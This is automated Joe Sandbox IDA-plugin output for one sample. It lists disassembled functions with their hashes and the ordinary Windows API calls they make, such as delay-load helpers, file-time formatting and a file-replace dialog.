Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: Message$DispatchItemPeekSendTranslate
String ID:
API String ID: 4142818094-0
Opcode ID: 7ef2505b9577f85ca14c53f4e289a6139dfdfd197cd668f893da80ac5ee46717
Instruction ID: 17a545ffd53426f2c66371064f7be584e437bc2b13f64a08f1ab528b182fa950
Opcode Fuzzy Hash: 7ef2505b9577f85ca14c53f4e289a6139dfdfd197cd668f893da80ac5ee46717
Instruction Fuzzy Hash: 15D09E32154300BAE6112B51DD06F0E7AAABB88F08F104559B249740F1C6629D31AB01

Function 00C8159F Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C81582

Part of subcall function 00C818A5: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C81922
Part of subcall function 00C818A5: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C81933

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ff192f3172a9a54adb58251cc26f9998f9398a1c748256722f0d55627802151b
Instruction ID: ab7e5e231eb8af43663440c2d3e0bca90d5032be638e3f3f734bdfa9494fe950
Opcode Fuzzy Hash: ff192f3172a9a54adb58251cc26f9998f9398a1c748256722f0d55627802151b
Instruction Fuzzy Hash: 14B012D5768100AE3904B1555D8BD3703DCC3C0B24738447EFC06C1081D8410C432236

Function 00C815A9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C81582

Part of subcall function 00C818A5: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C81922
Part of subcall function 00C818A5: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C81933

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ab09c0b3623c89926cdcc27acac00ae4a728f74f7d988a5c79747953be4e5f54
Instruction ID: 3b0c595ff6ef0b61051fbec0a4e103c0e6f0b15c0ed70fed9965f8823730746a
Opcode Fuzzy Hash: ab09c0b3623c89926cdcc27acac00ae4a728f74f7d988a5c79747953be4e5f54
Instruction Fuzzy Hash: 7EB012C5B58200AE3A04B1556C8BD3603DCC3C0B34339457EF807C1080D8400C832336

Function 00C81548 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C81521

Part of subcall function 00C818A5: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C81922
Part of subcall function 00C818A5: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C81933

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5cb41dd5812528ebd68efcb8a2c22301d1258bc200d4e0c4c701f2e2da1881c5
Instruction ID: 1039216afd99bbd7c8dfc2d6f227efe26fd0ac09e705f5ae932ce615e8f138d8
Opcode Fuzzy Hash: 5cb41dd5812528ebd68efcb8a2c22301d1258bc200d4e0c4c701f2e2da1881c5
Instruction Fuzzy Hash: 75B012C1658200BE790471059D4BD3A01DCC3C0F38335413FF802C0080D4510C83123A

Function 00C81570 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C81582

Part of subcall function 00C818A5: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C81922
Part of subcall function 00C818A5: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C81933

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5a3b5dd7f32960a487408f5ca47a070fd0e66976b3c797f4640472021094e521
Instruction ID: 2c80506c50472f1fae4130b9c6fbb3b31488bf654fb3f2d02e23d0fe29e13301
Opcode Fuzzy Hash: 5a3b5dd7f32960a487408f5ca47a070fd0e66976b3c797f4640472021094e521
Instruction Fuzzy Hash: F8B012C6768100BE3D0471615C8BC3603DCD3D0B25338847EF803C008098400C43213A

Function 00C8150F Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C81521

Part of subcall function 00C818A5: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C81922
Part of subcall function 00C818A5: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C81933

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: eb5f3a4c57d5fa3ba190a48feaf99f87e1357439dbd0455f828713779ba6037e
Instruction ID: 2dd3097ff523a7a490857403298173600d0cd0387d8c22fe764e910ec41a2db3
Opcode Fuzzy Hash: eb5f3a4c57d5fa3ba190a48feaf99f87e1357439dbd0455f828713779ba6037e
Instruction Fuzzy Hash: 96B012C5658100BE790431219D4BC3A01DCC3C0F38335803EFC02C008195410C43113A

Function 00C8152A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C81521

Part of subcall function 00C818A5: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C81922
Part of subcall function 00C818A5: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C81933

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 61e1c1e81a3bbdffaf66cda28194204532f8f24d7d80f8dcad2472a306ee0d0e
Instruction ID: 029f93ad0ecbb6fdc8286054c061bc3ab839db245e73844579728b55f7f42462
Opcode Fuzzy Hash: 61e1c1e81a3bbdffaf66cda28194204532f8f24d7d80f8dcad2472a306ee0d0e
Instruction Fuzzy Hash: 27B012C165A100BE7D0471099E4BE3601DCC3C0F3833A403EF802C0080D4C20C43123A

Function 00C8153E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C81521

Part of subcall function 00C818A5: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C81922
Part of subcall function 00C818A5: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C81933

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7ab47267bf66aea3b9e6f4ec854a277269fee5343e86bb99b3f6127fd360886f
Instruction ID: 2c5d66ec86616848963f1bfc6e2574feefc8d17f82ae37af9cb9c29586affe31
Opcode Fuzzy Hash: 7ab47267bf66aea3b9e6f4ec854a277269fee5343e86bb99b3f6127fd360886f
Instruction Fuzzy Hash: 48B012C1B58200BE7A047105AD4BD3602DCC3C0F38335413EF802C0080D4510D83223A

Function 00C81534 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C81521

Part of subcall function 00C818A5: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C81922
Part of subcall function 00C818A5: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C81933

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d74ec28428d8ad100f61bf2a9661c00514ae2d87fd1b5798ce5507b09215815a
Instruction ID: 6e78e9b05d380914dc8e72e96316321657a0dcacbb9897ba329f9d43d045fafc
Opcode Fuzzy Hash: d74ec28428d8ad100f61bf2a9661c00514ae2d87fd1b5798ce5507b09215815a
Instruction Fuzzy Hash: FCB012C1669100BE790472059D4BD3A01DCC7C0F3C339403EF802C0080D4C10C43123B

Function 00C8159A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C81582

Part of subcall function 00C818A5: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C81922
Part of subcall function 00C818A5: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C81933

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 16f32654b3f348edaca3621297769759599208e0c7f4c68d4d484f530c7c7624
Instruction ID: b7172d11dc317312aff0324f6b8d5e6da0ecb6698f6694d78492eded0bfe4d40
Opcode Fuzzy Hash: 16f32654b3f348edaca3621297769759599208e0c7f4c68d4d484f530c7c7624
Instruction Fuzzy Hash: 76A002D5559101BD750471515D87D36139DC5D5B657394979F80385081545118471135

Function 00C81590 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C81582

Part of subcall function 00C818A5: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C81922
Part of subcall function 00C818A5: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C81933

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 92924027ac00320e1dd0ef9b3ba8ed330fe46e71d636c874c0e1e1821bd45ee7
Instruction ID: b7172d11dc317312aff0324f6b8d5e6da0ecb6698f6694d78492eded0bfe4d40
Opcode Fuzzy Hash: 92924027ac00320e1dd0ef9b3ba8ed330fe46e71d636c874c0e1e1821bd45ee7
Instruction Fuzzy Hash: 76A002D5559101BD750471515D87D36139DC5D5B657394979F80385081545118471135

Function 00C81557 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C81521

Part of subcall function 00C818A5: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C81922
Part of subcall function 00C818A5: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C81933

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ff43860047c9a4029a8a72b651b396bbba370d28ef469dbde25188314f7b18fe
Instruction ID: fdbc03c0a93c7740d340a1a9062b6efb865b3a02f03674ed9cf0646b60d10a7a
Opcode Fuzzy Hash: ff43860047c9a4029a8a72b651b396bbba370d28ef469dbde25188314f7b18fe
Instruction Fuzzy Hash: D0A002D5559101BD750571519D47C36119DC5D4F793754539F80384081545118471139

Function 00C8156B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C81521

Part of subcall function 00C818A5: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C81922
Part of subcall function 00C818A5: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C81933

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c22accb35adccfe5ff481eb039154d1fa391aba7c696fafcc3fd377d1fc49ecc
Instruction ID: fdbc03c0a93c7740d340a1a9062b6efb865b3a02f03674ed9cf0646b60d10a7a
Opcode Fuzzy Hash: c22accb35adccfe5ff481eb039154d1fa391aba7c696fafcc3fd377d1fc49ecc
Instruction Fuzzy Hash: D0A002D5559101BD750571519D47C36119DC5D4F793754539F80384081545118471139

Function 00C81561 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C81521

Part of subcall function 00C818A5: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C81922
Part of subcall function 00C818A5: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C81933

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e5ea2428b9e912d4eca7f62cf9466cbac33f6cdf8e49bbc66b49881d0711779c
Instruction ID: fdbc03c0a93c7740d340a1a9062b6efb865b3a02f03674ed9cf0646b60d10a7a
Opcode Fuzzy Hash: e5ea2428b9e912d4eca7f62cf9466cbac33f6cdf8e49bbc66b49881d0711779c
Instruction Fuzzy Hash: D0A002D5559101BD750571519D47C36119DC5D4F793754539F80384081545118471139

Function 00C7217A Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,00C786BE), ref: 00C7217D

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: a5c46ed9781e57335d1ed77fef36839cfb621e83f3ffbc1bf89f33c72398bda5
Instruction ID: 174fd48fdc24e03cd7435a0482a2f8430345814164de1edb74ada5ba1ae5dc39
Opcode Fuzzy Hash: a5c46ed9781e57335d1ed77fef36839cfb621e83f3ffbc1bf89f33c72398bda5
Instruction Fuzzy Hash: CAB011300B080A8A8E222B30CC08A283A20EA2230A300A2A0A003C80A0CB22C023AB80

Function 00C7DF59 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,00C7E0EE,C:\Users\user\Desktop,00000000,00CB9732,00000006), ref: 00C7DF5D

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 3cc54d71a0c0993130f5a152a0e18ef4926644d519d235274d74f015980cd5fd
Instruction ID: 52a083cc4c955c1bad1e67501052aa641ab583a239e429865bdd11f26763d8f2
Opcode Fuzzy Hash: 3cc54d71a0c0993130f5a152a0e18ef4926644d519d235274d74f015980cd5fd
Instruction Fuzzy Hash: 3FA012302940064A8A010F30CC0DA1975506760702B10E6217003C10A0CB304424A600

Non-executed Functions

Function 00C7F3FB Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 289timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00C71180: GetDlgItem.USER32(00000000,00003021), ref: 00C711C4
Part of subcall function 00C71180: SetWindowTextW.USER32(00000000,00C95294), ref: 00C711DA

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00C7F48C
EndDialog.USER32(?,00000006), ref: 00C7F49F
GetDlgItem.USER32(?,0000006C), ref: 00C7F4BB
SetFocus.USER32(00000000), ref: 00C7F4C2
SetDlgItemTextW.USER32(?,00000065,?), ref: 00C7F502
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00C7F535
FindFirstFileW.KERNEL32(?,?), ref: 00C7F54B
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C7F569
FileTimeToSystemTime.KERNEL32(?,?), ref: 00C7F579
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00C7F596
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00C7F5B4

Part of subcall function 00C73FB9: LoadStringW.USER32(?,?,00000200,?), ref: 00C73FFE
Part of subcall function 00C73FB9: LoadStringW.USER32(?,?,00000200,?), ref: 00C74014

_swprintf.LIBCMT ref: 00C7F5E4

Part of subcall function 00C736D0: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C736E3

SetDlgItemTextW.USER32(?,0000006A,?), ref: 00C7F5F7
FindClose.KERNEL32(00000000), ref: 00C7F5FA
_swprintf.LIBCMT ref: 00C7F655
SetDlgItemTextW.USER32(?,00000068,?), ref: 00C7F668
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00C7F67E
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00C7F69E
FileTimeToSystemTime.KERNEL32(?,?), ref: 00C7F6AE
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00C7F6C8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00C7F6E0
_swprintf.LIBCMT ref: 00C7F711
SetDlgItemTextW.USER32(?,0000006B,?), ref: 00C7F724
_swprintf.LIBCMT ref: 00C7F774
SetDlgItemTextW.USER32(?,00000069,?), ref: 00C7F787

Part of subcall function 00C7E1A3: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00C7E1C9
Part of subcall function 00C7E1A3: GetNumberFormatW.KERNEL32(00000400,00000000,?,00C9F044,?,?), ref: 00C7E218

Strings

REPLACEFILEDLG, xrefs: 00C7F422
%s %s, xrefs: 00C7F643, 00C7F766
%s %s %s, xrefs: 00C7F5D2, 00C7F6FE

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
